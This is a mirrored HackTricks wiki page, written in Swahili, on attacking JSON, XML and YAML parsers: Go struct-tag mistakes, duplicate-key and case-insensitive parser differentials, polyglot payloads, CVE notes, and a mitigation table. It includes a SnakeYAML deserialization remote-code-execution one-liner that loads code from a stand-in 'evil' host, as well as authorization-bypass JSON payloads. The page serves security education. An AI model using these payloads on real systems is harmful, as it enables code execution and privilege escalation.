maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/json-xml-yaml-hacking.md

165 lines
6.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# JSON, XML & Yaml Hacking & Issues
{{#include ../banners/hacktricks-training.md}}
## Go JSON Decoder
Masuala yafuatayo yaligundulika katika Go JSON ingawa yanaweza kuwepo katika lugha nyingine pia. Masuala haya yalichapishwa katika [**hiki kipande cha blog**](https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/).
Parsers za JSON, XML, na YAML za Go zina historia ndefu ya kutokuelewana na mipangilio isiyo salama ambayo inaweza kutumika **kuzidi uthibitisho**, **kuinua mamlaka**, au **kutoa data nyeti**.
### (Un)Marshaling Data Isiyotarajiwa
Lengo ni kutumia structs ambazo zinamruhusu mshambuliaji kusoma/kandika maeneo nyeti (mfano, `IsAdmin`, `Password`).
- Mfano wa Struct:
```go
type User struct {
Username string `json:"username,omitempty"`
Password string `json:"password,omitempty"`
IsAdmin bool `json:"-"`
}
```
- Uthibitisho wa Kawaida
1. **Kikosi kilichokosekana** (hakuna kikosi = uwanja bado unachambuliwa kwa chaguo-msingi):
```go
type User struct {
Username string
}
```
Payload:
```json
{"Username": "admin"}
```
2. **Matumizi yasiyo sahihi ya `-`**:
```go
type User struct {
IsAdmin bool `json:"-,omitempty"` // ❌ wrong
}
```
Payload:
```json
{"-": true}
```
✔️ Njia sahihi ya kuzuia uwanja usiweze (kuwekwa) au (kuondolewa) kutoka kwa marshaling:
```go
type User struct {
IsAdmin bool `json:"-"`
}
```
### Parser Differentials
Lengo ni kupita idhini kwa kutumia jinsi parser tofauti zinavyotafsiri payload sawa kwa njia tofauti kama katika:
- CVE-2017-12635: Apache CouchDB bypass kupitia funguo za kurudiwa
- 2022: Zoom 0-click RCE kupitia kutokuwepo kwa usawa kwa parser ya XML
- GitLab 2025 SAML bypass kupitia tabia za XML
**1. Duplicate Fields:**
Go's `encoding/json` inachukua **field** ya **mwisho**.
```go
json.Unmarshal([]byte(`{"action":"UserAction", "action":"AdminAction"}`), &req)
fmt.Println(req.Action) // AdminAction
```
Waparser wengine (kwa mfano, Jackson ya Java) wanaweza kuchukua **ya kwanza**.
**2. Kutokuwa na Uthibitisho wa Kesi:**
Go haina uthibitisho wa kesi:
```go
json.Unmarshal([]byte(`{"AcTiOn":"AdminAction"}`), &req)
// matches `Action` field
```
Hata hila za Unicode zinafanya kazi:
```go
json.Unmarshal([]byte(`{"ationſ": "bypass"}`), &req)
```
**3. Mismatch ya huduma nyingi:**
Fikiria:
- Proxy iliyoandikwa kwa Go
- Huduma ya AuthZ iliyoandikwa kwa Python
Mshambuliaji anatumia:
```json
{
"action": "UserAction",
"AcTiOn": "AdminAction"
}
```
- Python inaona `UserAction`, inaruhusu
- Go inaona `AdminAction`, inatekeleza
### Data Format Confusion (Polyglots)
Lengo ni kutumia mifumo inayochanganya muundo (JSON/XML/YAML) au kushindwa kufungua kwenye makosa ya parser kama:
- **CVE-2020-16250**: HashiCorp Vault ilipars JSON kwa kutumia parser ya XML baada ya STS kurudisha JSON badala ya XML.
Mshambuliaji anadhibiti:
- Kichwa cha `Accept: application/json`
- Udhibiti wa sehemu ya mwili wa JSON
Parser ya XML ya Go ilipars **bila kujali** na kuamini utambulisho ulioingizwa.
- Payload iliyoundwa:
```json
{
"action": "Action_1",
"AcTiOn": "Action_2",
"ignored": "<?xml version=\"1.0\"?><Action>Action_3</Action>"
}
```
- **Go JSON** parser: `Action_2` (case-insensitive + last wins)
- **YAML** parser: `Action_1` (case-sensitive)
- **XML** parser: parses `"Action_3"` inside the string
---
## Uthibitisho wa Hatari za Parser Zinazojulikana (2023-2025)
> Masuala yafuatayo yanayoweza kutumika hadharani yanaonyesha kwamba uchambuzi usio salama ni tatizo la lugha nyingi — si tatizo la Go pekee.
### SnakeYAML Deserialization RCE (CVE-2022-1471)
* Inahusisha: `org.yaml:snakeyaml` < **2.0** (inayotumiwa na Spring-Boot, Jenkins, nk.).
* Sababu ya msingi: `new Constructor()` inachambua **darasa la Java la kiholela**, ikiruhusu mnyororo wa vifaa unaomalizika kwa utekelezaji wa msimbo wa mbali.
* One-liner PoC (itafungua kalkuleta kwenye mwenyeji aliye hatarini):
```yaml
!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ]
```
* Fix / Mitigation:
1. **Sasisha hadi ≥2.0** (inatumia `SafeLoader` kama chaguo la default).
2. Katika toleo za zamani, tumia waziwazi `new Yaml(new SafeConstructor())`.
### libyaml Double-Free (CVE-2024-35325)
* Inahusisha: `libyaml` ≤0.2.5 (maktaba ya C inayotumiwa na viunganishi vingi vya lugha).
* Tatizo: Kuita `yaml_event_delete()` mara mbili husababisha double-free ambayo washambuliaji wanaweza kugeuza kuwa DoS au, katika hali zingine, unyakuzi wa heap.
* Hali: Upstream ilikataa kama “matumizi mabaya ya API”, lakini usambazaji wa Linux ulisambaza **0.2.6** iliyorekebishwa ambayo inafanya null-free pointer kwa njia ya kujihami.
### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684)
* Inahusisha: Tencent **RapidJSON** kabla ya commit `8269bc2` (<1.1.0-patch-22).
* Kosa: Katika `GenericReader::ParseNumber()` hesabu isiyoangaliwa inawawezesha washambuliaji kuunda nambari kubwa ambazo zinapita na kuharibu heap hatimaye kuwezesha kupandisha hadhi wakati grafu ya kitu inayotokana inatumika kwa maamuzi yaidhinishaji.
---
### 🔐 Mitigations (Updated)
| Hatari | Fix / Recommendation |
|-------------------------------------|------------------------------------------------------------|
| Nyamba zisizojulikana (JSON) | `decoder.DisallowUnknownFields()` |
| Nyamba za kurudiwa (JSON) | Hakuna fix katika stdlib thibitisha na [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) |
| Mechi isiyo na herufi kubwa (Go) | Hakuna fix thibitisha lebo za muundo + pre-canonicalize input |
| Takataka za XML / XXE | Tumia parser iliyoimarishwa (`encoding/xml` + `DisallowDTD`) |
| Funguo zisizojulikana za YAML | `yaml.KnownFields(true)` |
| **Deserialization ya YAML isiyo salama** | Tumia SafeConstructor / sasisha hadi SnakeYAML 2.0 |
| libyaml 0.2.5 double-free | Sasisha hadi **0.2.6** au toleo lililorekebishwa na distro |
| RapidJSON <patched commit | Jenga dhidi ya RapidJSON ya hivi karibuni (≥Julai 2024) |
## References
- Baeldung Resolving CVE-2022-1471 With SnakeYAML 2.0
- Ubuntu Security Tracker CVE-2024-35325 (libyaml)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink